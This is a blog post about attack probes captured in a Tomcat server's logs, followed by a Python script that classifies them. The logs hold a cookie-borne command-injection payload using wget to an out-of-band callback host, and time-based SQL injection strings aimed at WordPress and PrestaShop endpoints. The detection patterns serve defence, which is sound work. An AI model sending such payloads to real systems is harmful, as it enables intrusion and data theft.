2024-09-19 Seeing someone else's escape attempts in the input on Tomcat

There is a server that has never been shut down, and it sits on the unusual port 8443, yet a hacker actually took up the challenge of trying to break in.

The hacker is fairly polite: rather than hammering away with malformed patterns, roughly one exception line shows up per day. Perhaps the other inputs were legal, so they did not appear in the debug console.

Recent news includes:

On September 3, 2024, Zyxel published a security advisory patching an operating system command injection vulnerability, CVE-2024-7261 (CVSSv3 score 9.8), in several AP (access point) and security router models; it may allow an unauthenticated attacker to execute operating system commands by sending a specially crafted cookie.

Zyxel explains that in the CGI program of certain AP and security router (USG LITE 60AX) versions, special elements in the "host" parameter are not neutralized correctly (improper neutralization); an attacker can send a crafted cookie and thereby execute operating system commands without authentication, which may bring significant risk, including data leakage or service interruption.

My feeling is that assembling illogical content with a program gives a chance of making the server-side program escape, and from there an intrusion.

Sharing the console log from Eclipse:

Sep 14, 2024 2:02:05 PM org.apache.coyote.http11.Http11Processor service
INFO: Error parsing HTTP request header
Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x000x00S0x010x000x00O0x030x00?G0xc30x970xc30xb70xc20xba,0xc30xae0xc30xaa0xc20xb2`~0xc30xb30x000xc30xbd0xc20x82{0xc20xb90xc30x950xc20x960xc30x88w0xc20x9b0xc30xa60xc30x840xc30x9b<=0xc30x9bo0xc30xaf0x10n0x000x00(0x000x160x000x130x000x0a0x00f0x000x050x000x040x00e0x00d0x00c0x00b0x00a0x00`0x000x150x000x120x000x090x000x140x000x110x000x080x000x060x000x030x010x00...]. HTTP method names must be tokens
at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:407)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:256)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:936)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1791)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52)
at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1190)
at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:63)
at java.base/java.lang.Thread.run(Thread.java:1570)

Sep 16, 2024 2:22:43 AM org.apache.tomcat.util.http.parser.Cookie logInvalidHeader
INFO: A cookie header was received [sessionid='`wget http://crd6bmsqa1h3u36ee03gipxw698cym3e9.oast.pro`'] that contained an invalid cookie. That cookie will be ignored.
Note: further occurrences of this error will be logged at DEBUG level.

Sep 17, 2024 9:23:55 PM org.apache.coyote.http11.Http11Processor service
INFO: Error parsing HTTP request header
Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in the request target [/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json ]. The valid characters are defined in RFC 7230 and RFC 3986
at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:482)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:256)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:936)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1791)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52)
at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1190)
at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:63)
at java.base/java.lang.Thread.run(Thread.java:1570)

Sep 19, 2024 5:43:51 AM org.apache.coyote.http11.Http11Processor service
INFO: Error parsing HTTP request header
Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in the request target [/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) ]. The valid characters are defined in RFC 7230 and RFC 3986
at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:482)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:256)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:936)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1791)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52)
at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1190)
at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:63)
at java.base/java.lang.Thread.run(Thread.java:1570)
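The three kinds of probe in the log above can be told apart mechanically, and a defender watching catalina.out wants them labelled rather than buried among INFO lines. Below is an added example in Python (not code from the original post or from Tomcat) that reads Tomcat's parsing-error messages and classifies each bracketed payload: a "method name" starting with the bytes 0x16 0x03 is a TLS handshake record header, that is, a TLS ClientHello arriving at a plaintext connector; backticks or $( ) inside a cookie value are shell command substitution, the same shape as the cookie-borne OS command injection Zyxel describes; and a URL-decoded request target carrying SLEEP() inside a subselect is a time-based blind SQL injection probe. The sample log is constructed from the lines above, with the callback hostname replaced by a placeholder.

```python
"""Classify the probes that surface in Tomcat's request-parsing log messages.

Added example, not from the original post.  Tomcat rejected all three
payloads at parse time (hence the INFO messages), so nothing here executed;
the point is to turn those messages into labelled events for alerting.
"""
import re
from collections import Counter
from urllib.parse import unquote

# The bracketed payload Tomcat includes in each of the three messages.
METHOD_RE = re.compile(r"Invalid character found in method name \[(.*?)\]\. HTTP method")
COOKIE_RE = re.compile(r"A cookie header was received \[(.*?)\] that contained an invalid cookie")
TARGET_RE = re.compile(r"Invalid character found in the request target \[(.*?)\s*\]\. The valid characters")

# Shell command substitution inside a header value: `cmd` or $(cmd).
SHELL_SUBST_RE = re.compile(r"`([^`]*)`|\$\(([^)]*)\)")
# Time-based blind SQLi primitives in the URL-decoded query string.
SQLI_TIME_RE = re.compile(r"\b(SLEEP|BENCHMARK|WAITFOR\s+DELAY|pg_sleep)\s*\(", re.IGNORECASE)


def classify_line(line):
    """Return {"kind": ..., "detail": ...} for a Tomcat parsing-error line,
    or None when the line is not one of the three message types."""
    m = METHOD_RE.search(line)
    if m:
        raw = m.group(1)
        # 0x16 = TLS handshake record type, 0x03 = major version byte of
        # SSL3/TLS: a ClientHello sent to a connector that speaks plain HTTP.
        if raw.startswith("0x160x03"):
            return {"kind": "tls_on_plaintext_port", "detail": raw[:16]}
        return {"kind": "non_http_bytes", "detail": raw[:16]}

    m = COOKIE_RE.search(line)
    if m:
        cookie = m.group(1)
        subst = SHELL_SUBST_RE.search(cookie)
        if subst:
            cmd = subst.group(1) if subst.group(1) is not None else subst.group(2)
            return {"kind": "command_injection_probe", "detail": cmd}
        return {"kind": "malformed_cookie", "detail": cookie}

    m = TARGET_RE.search(line)
    if m:
        decoded = unquote(m.group(1))          # %20 -> space etc.
        path = decoded.split("?", 1)[0]        # report the targeted path only
        if SQLI_TIME_RE.search(decoded):
            return {"kind": "time_based_sqli_probe", "detail": path}
        return {"kind": "malformed_request_target", "detail": path}

    return None


def classify_log(text):
    """Classify every line of a log; lines that are not probes are skipped."""
    return [ev for ev in (classify_line(l) for l in text.splitlines()) if ev]


def summarize(events):
    """Count events per kind, the shape you would ship to a SIEM."""
    return dict(Counter(ev["kind"] for ev in events))


# Constructed sample log modelled on the post's Eclipse console output.
# The callback hostname is a placeholder, not the one seen on the server.
SAMPLE_LOG = """\
Sep 14, 2024 2:02:05 PM org.apache.coyote.http11.Http11Processor service
INFO: Error parsing HTTP request header
java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x000x00S0x010x000x00O0x030x00...]. HTTP method names must be tokens
Sep 16, 2024 2:22:43 AM org.apache.tomcat.util.http.parser.Cookie logInvalidHeader
INFO: A cookie header was received [sessionid='`wget http://callback.oast-placeholder.invalid`'] that contained an invalid cookie. That cookie will be ignored.
Sep 17, 2024 9:23:55 PM org.apache.coyote.http11.Http11Processor service
java.lang.IllegalArgumentException: Invalid character found in the request target [/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json ]. The valid characters are defined in RFC 7230 and RFC 3986
Sep 19, 2024 5:43:51 AM org.apache.coyote.http11.Http11Processor service
java.lang.IllegalArgumentException: Invalid character found in the request target [/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) ]. The valid characters are defined in RFC 7230 and RFC 3986
"""

if __name__ == "__main__":
    for ev in classify_log(SAMPLE_LOG):
        print(f"{ev['kind']:28s} {ev['detail']}")
    print(summarize(classify_log(SAMPLE_LOG)))
```

Run it against catalina.out instead of SAMPLE_LOG to get the same labels for a real server. Note that once Tomcat has logged "further occurrences ... will be logged at DEBUG level", later probes of the same type are invisible at the default INFO level, so a collector that relies on these messages needs the org.apache.coyote and org.apache.tomcat.util.http.parser loggers raised to DEBUG, or the connector fronted by something that records raw request lines.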
